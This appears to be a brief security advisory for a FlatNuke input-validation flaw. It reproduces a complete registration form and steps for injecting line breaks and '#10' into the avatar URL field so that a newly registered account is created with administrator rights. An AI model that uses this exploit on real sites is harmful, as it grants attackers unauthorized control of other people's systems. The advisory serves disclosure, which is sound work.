|
|
FlatNuke Form Submission Input Validation Vulnerability
The following example submission form was provided: <form action="http://www.sitewithflatnuke.org/forum/index.php" method=post name="registra"> <input type=hidden name=op value=reg> Username*: <input name=nome><br> Password*: <input name="regpass" type="password"><br> Password*: <input name="reregpass" type="password"><br> Name: <input name=anag><br> E-mail: <input name=email><br> Homepage: <input name=homep value="http://"><br> Job: <input name=prof><br> Country: <input name=prov><br> <select name="ava"> <option value="">----</option> <option value="blank.png">blank.png</option> </select> <br><br> Or remote image URL:<br><br> <textarea name="url_avatar" rows=5 cols=23></textarea> <br> Signature: <textarea name=firma rows=5 cols=23></textarea> <center> <input type=submit value="Send"> </center> </form> Open the form in a Web browser and enter information in all fields. In the url_avatar field, press Enter at least twice and insert the text "#10" without quotes. Submitting this form will cause the account to be created as an administrator account. |
|
Privacy Statement |